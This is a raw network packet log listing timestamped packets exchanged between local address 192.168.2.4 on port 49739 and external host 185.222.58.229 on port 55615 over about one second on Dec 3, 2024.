Dec 3, 2024 13:27:16.825161934 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.825195074 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.825195074 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.825239897 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.825315952 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.825325012 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.825372934 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.825396061 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.825404882 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.825414896 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.825443029 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.825467110 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.825541019 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.825613976 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.825650930 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.825659990 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.825722933 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.825850010 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.825860023 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.825906038 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.825922966 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.825993061 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.825999022 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.826045990 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.826049089 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.826102018 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.826112032 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.826157093 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.826189995 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.826245070 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.826246023 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.826287985 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.826383114 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.826410055 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.826486111 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.826514959 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.826591969 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.826600075 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.826633930 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.826685905 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.826751947 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.826759100 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.826801062 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.826802015 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.826874971 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.945157051 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.945238113 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.945241928 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.945292950 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.945367098 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.945409060 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.945415020 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.945456982 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.945513964 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.945559025 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.945565939 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.945606947 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.945667028 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.945710897 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.945795059 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.945837021 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.946024895 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.946064949 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.946074009 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.946122885 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.946223021 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.946270943 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.946338892 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.946387053 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.946438074 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.946479082 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.946546078 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.946588039 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.946662903 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.946707964 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.946769953 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.946814060 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.946872950 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.946913004 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.947021008 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.947030067 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.947076082 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.947154045 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.947161913 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.947206020 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.947218895 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.947235107 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.947262049 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.947282076 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.947305918 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.947350025 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.947350025 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.947396040 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.947413921 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.947422028 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.947465897 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.947571993 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.947580099 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.947590113 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.947618008 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.947623968 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.947634935 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.947665930 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.947745085 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.947753906 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.947762966 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.947792053 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.947807074 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.947858095 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.947866917 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.947915077 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.947974920 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.947983980 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.947987080 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948031902 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.948071003 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948079109 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948081970 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948088884 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948122025 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.948144913 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.948183060 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948191881 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948227882 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.948244095 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948276043 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948291063 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.948301077 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948317051 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948319912 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.948348045 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.948363066 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.948424101 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948458910 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948466063 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.948494911 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.948529959 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948548079 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948596954 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.948688030 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948713064 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948730946 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.948749065 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.948753119 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948761940 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948810101 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948813915 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.948817968 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948856115 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.948883057 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948890924 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948900938 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948936939 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948944092 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:16.948961020 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:16.948981047 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.065299034 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.065341949 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.065388918 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.065406084 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.065412998 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.065417051 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.065466881 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.065510035 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.065520048 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.065551996 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.065571070 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.065629959 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.065640926 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.065676928 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.065697908 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.065717936 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.065743923 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.065762043 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.065790892 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.065800905 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.065838099 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.065917969 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.065929890 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.065953016 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.065963030 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.065973997 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.066009998 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.066020012 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.066071987 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.066077948 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.066124916 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.066210032 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.066220045 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.066257000 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.066293955 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.066303968 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.066346884 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.066404104 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.066415071 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.066452026 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.066529989 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.066539049 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.066577911 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.066607952 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.066620111 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.066648006 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.066654921 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.066658974 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.066706896 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.066745043 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.066755056 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.066793919 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.066895008 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.066905022 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.066946983 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.067102909 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.067116976 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.067148924 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.067164898 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.067281008 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.067291021 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.067329884 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.067343950 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.067353964 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.067387104 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.067425966 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.067470074 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.067565918 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.067575932 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.067579985 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.067627907 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.067639112 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.067648888 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.067686081 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.067732096 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.067742109 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.067785978 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.067807913 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.067817926 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.067854881 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.067897081 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.067905903 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.067946911 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.067991018 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.068001986 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.068037033 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.068134069 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.068181992 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.068205118 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.068250895 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.068336964 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.068346024 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.068384886 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.068473101 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.068490028 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.068526983 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.068533897 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.068536997 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.068562031 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.068569899 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.068588018 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.068615913 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.068653107 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.068662882 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.068666935 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.068675995 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.068713903 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.068728924 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.068736076 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.068763971 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.068780899 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.068809986 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.068902016 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.068912029 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.068941116 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.068949938 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.068949938 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.068958998 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069005013 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.069032907 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069041967 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069084883 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.069097042 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069104910 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069144011 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.069323063 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069331884 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069335938 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069344044 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069361925 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069369078 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069387913 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.069406033 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.069418907 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.069463968 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069473982 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069513083 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.069515944 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069526911 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069570065 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.069652081 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069660902 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069680929 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069693089 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069709063 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.069730997 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069735050 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.069761038 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069792986 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.069813967 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.069853067 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069870949 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.069907904 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.070023060 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070033073 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070035934 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070044041 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070081949 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.070095062 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070096970 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.070105076 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070137024 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070144892 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.070146084 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070185900 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.070251942 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070261002 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070303917 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070303917 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.070313931 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070343971 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070354939 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.070394039 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.070399046 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070442915 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.070529938 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070539951 CET	55615	49739	185.222.58.229	192.168.2.4
